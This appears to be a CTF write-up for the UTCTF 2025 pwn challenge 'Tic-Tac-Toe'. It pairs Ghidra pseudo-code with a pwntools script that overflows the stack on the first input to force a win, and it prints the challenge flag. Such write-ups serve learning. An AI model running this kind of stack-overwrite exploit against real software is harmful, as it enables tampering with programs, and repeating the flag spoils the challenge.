UTCTF 2025 - PWN: Tic-Tac-Toe | MindCrafters CTF Team

Introduction

Unfortunately, we did only one task, but very interesting. This task came from this CTF. This is a simple game of tic-tac-toe. The computer goes first, so you have no chance of winning. At best, you can achieve a draw. The solution is to overwrite a certain memory area so that local_10 equals one. That is not so simple. Unfortunately, this is not present in the code, so you have to do it yourself by overwriting the memory right at the start (when type 'x' or 'o'). Below is a fragment of pseudo-C code from Ghidra.

  if (local_c == 0) {
    if (local_10 == 0) {
      puts("Tie");
    }
    else {
      puts("Player wins");
      get_flag();
    }

Solution

from pwn import *             

context.update(arch='x86_64', os='linux') 
context.terminal = ['wt.exe','wsl.exe'] 

HOST="nc challenge.utctf.live 7114"
ADDRESS,PORT=HOST.split()[1:]


BINARY_NAME="./tictactoe"
#BINARY_NAME="./tictactoe-local10-on1"
binary = context.binary = ELF(BINARY_NAME, checksec=False)


if args.REMOTE:
    p = remote(ADDRESS,PORT)
else:
    p = process(binary.path)    

#You have to overwrite stack at the beginning
p.sendline(b'x'+b'\x00'*60+b'\x01')

#get TIE

p.sendlineafter(b"Current board state:",b'5')
p.sendlineafter(b"Current board state:",b'3')
p.sendlineafter(b"Current board state:",b'4')
p.sendlineafter(b"Current board state:",b'8')

p.interactive()

utflag{!pr0_g4m3r_4l3rt!}